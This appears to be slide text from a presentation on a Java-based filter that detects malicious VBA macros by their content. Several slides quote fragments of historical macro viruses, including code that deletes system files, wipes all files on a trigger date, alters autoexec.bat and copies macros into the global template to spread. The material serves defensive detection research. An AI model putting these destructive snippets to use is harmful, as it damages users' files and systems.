2. Design and Implementation of The FiltroMatic™ Presented By: Lord Viper Scorpion D4 C0rrupt0r The Dark Stallion of Chaos Master of Terror

3. Why Worry About Macro Viruses? There are a lot of maladjusted individuals with no better way to deal with their frustration with society Microsoft allows macros way too many privileges, and this is really easy to exploit Macro viruses cause a lot of damage – $12.1B in 1999, according to Computer Economics – Melissa alone caused $80 million in damage

4. Why are Current Methods Ineffective and How can we Improve Them? Commercial anti-virus programs only check for fingerprints of known viruses We propose a generalized macro filter that looks for viruses based on the content of the code How does one determine if code is “bad” or not?

5. VBA Background What is VBA and how is it used? – General purpose scripting language for Office applications – Used to automate repetitive tasks, format documents… Where does it derive its functionality? – From Application object libraries – From the Windows API,.DLLs on the host system So what’s the problem? – A VBA macro has the same privileges on the host as a native executable

6. Dealing with Microsoft’s Lack of Foresight How can we compensate for the security vulnerabilities introduced by VBA? – By scanning macros for code that is clearly malicious – By alerting the user of possible misuse of code that could go either way – By trying to identify malicious macros without flagging legitimate ones

7. Designing a Macro Filter Background Research – Learned VBA mechanisms – Reviewed known malicious macros – Compiled a list of VBA functions common to macro viruses – Reviewed legitimate macros to determine where “gray” areas exist

8. Example of VBA Malcode From the “Friends” macro virus: Open “C:\autoexec.bat” For Append As #1 Print #1, “@echo off” Print #1, “c:\dos\fast.com” Close #1

9. Another Example of VBA Malcode From “Galicia Kalidade” macro virus: If EdicinBuscarEncontrado() <> 0 Then FijarAtributos "C:\IO.SYS",0 FijarAtributos "C:\MSDOS.SYS",0 Kill "C:\IO.SYS" Kill "C:\MSDOS.SYS"

10. Yet Another VBA Malcode Example From the “Atom” macro virus: Sub MAIN On Error Goto KillError If Day(Now()) = 13 And Month(Now() = 12) Then Kill “*.*” End If KillError: End Sub

11. Yes, You Guessed It … Another VBA Virus Example From the “Retro” macro virus: If Not Y Then F$ = WindowName$() S$ = F$ + ":Puritan“ MacroCopy S$, "Global:Puritan" S$ = F$ + ":Rtr“ MacroCopy S$, "Global:Retro" S$ = F$ + ":FSAB“ MacroCopy S$, "Global:FileSaveAs" S$ = F$ + ":FSAB“ MacroCopy S$, "Global:FSAB" S$ = F$ + ":AOB“ MacroCopy S$, "Global:AOB“ End If

12. Implementation of our Filter We chose to implement it as a Java library that developers could integrate into their applications. Implementation consists of MacroScanner, MalCodeItem, MalCodeList, Report, and ReportItem. Tailored scanner to minimize false positives. What weaknesses does our method have?

13. Sample of Scanning Results for Malicious Macros

14. Sample of Scanning Results for Legitimate Macros

15. Conclusions Macro viruses tend to use the same mechanisms to spread and attack Our filter takes advantage of these similarities to detect known and unknown macro viruses